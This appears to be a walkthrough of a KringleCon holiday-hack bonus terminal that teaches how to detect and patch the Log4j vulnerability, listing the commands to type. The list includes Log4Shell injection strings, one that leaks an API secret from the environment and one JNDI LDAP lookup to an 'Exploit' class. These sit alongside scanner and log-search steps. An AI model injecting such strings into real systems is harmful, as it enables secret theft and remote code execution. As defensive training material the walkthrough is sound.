Bonus! Blue Log4Jack
Details
- Location: North Pole
- Elf: Bow Ninecandle
Troll's Objective Message
Well hello! I'm Bow Ninecandle! Sorry I'm late to KringleCon; I got delayed by this other... thing. Say, would you be interested in taking a look? We're trying to defend the North Pole systems from the Yule Log4Jack vulnerability. This terminal has everything you need to get going, and it'll walk you through the process. Go ahead and give it a try! No previous experience with Log4j required. We'll even supply a checker script in the terminal for vulnerable libraries that you could use in your own environment. The talk Prof. Petabyte is giving will be helpful too! Oh, and don't worry if this doesn't show up in your badge. This is just a fun extra!
This terminal is located at the North Pole. This terminal challenge helps and walks you through understanding the Log4J vulnerabilty. This terminal challenge will walk through what you need to do, but just incase you need additional help, here are the commands you need to type in the terminal:
yes
next
ls
cd vulnerable
ls
cat DisplayFilev1.java
javac DisplayFilev1.java
java DisplayFilev1 testfile.txt
java DisplayFilev1 testfile2.txt
Next
cat DisplayFilev2.java
next
javac DisplayFilev2.java
java DisplayFilev2 testfile2.txt
Next
java DisplayFilev2 '${java:version}'
java DisplayFilev2 '${env:APISECRET}'
Next
startserver.sh
java DisplayFilev2 '${jndi:ldap://127.0.0.1:1389/Exploit}'
Ctrl-C
cd ~/patched/
ls
source classpath.sh
javac DisplayFilev2.java
java DisplayFilev2 '${java:version}'
Cd
log4j2-scan vulnerable/
log4j2-scan patched/
log4j2-scan /var/www/solr
Next
ls /var/log/www
cat logshell-search.sh
logshell-search.sh /var/log/www
logshell-search.sh /var/log/www | sed '1!d'
logshell-search.sh /var/log/www | sed '2!d'
logshell-search.sh /var/log/www | sed '3!d'